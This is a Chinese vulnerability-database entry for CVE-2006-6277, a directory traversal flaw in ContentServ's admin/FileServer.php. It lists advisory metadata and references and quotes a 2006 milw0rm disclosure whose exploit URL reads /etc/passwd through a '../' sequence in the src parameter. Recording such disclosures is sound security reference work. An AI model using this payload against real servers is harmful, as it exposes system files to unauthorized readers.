ContentServ 'FileServer.php' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111696 漏洞类型 路径遍历
发布时间 2006-12-01 更新时间 2006-12-06
CVE编号 CVE-2006-6277 CNNVD-ID CNNVD-200612-047
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2878
https://cxsecurity.com/issue/WLB-2006120060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-047
|漏洞详情
ContentServ的admin/FileServer.php中存在目录遍历漏洞,远程攻击者可以借助在src参数(该参数中包含..)来读取任意文件。
|漏洞EXP
ContentServ again (still) features remote reading of arbitrary files
====================================================================

ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continously enhance our products and services.[...]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Lets forget the sql injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

# milw0rm.com [2006-12-01]
|参考资料

来源:BID
名称:21369
链接:http://www.securityfocus.com/bid/21369
来源:BUGTRAQ
名称:20061130contentserv4.x
链接:http://www.securityfocus.com/archive/1/archive/1/453130/100/0/threaded
来源:XF
名称:contentserv-fileserver-directory-traversal(30648)
链接:http://xforce.iss.net/xforce/xfdb/30648
来源:VUPEN
名称:ADV-2006-4808
链接:http://www.frsirt.com/english/advisories/2006/4808
来源:SREASON
名称:1989
链接:http://securityreason.com/securityalert/1989
来源:SECUNIA
名称:23158
链接:http://secunia.com/advisories/23158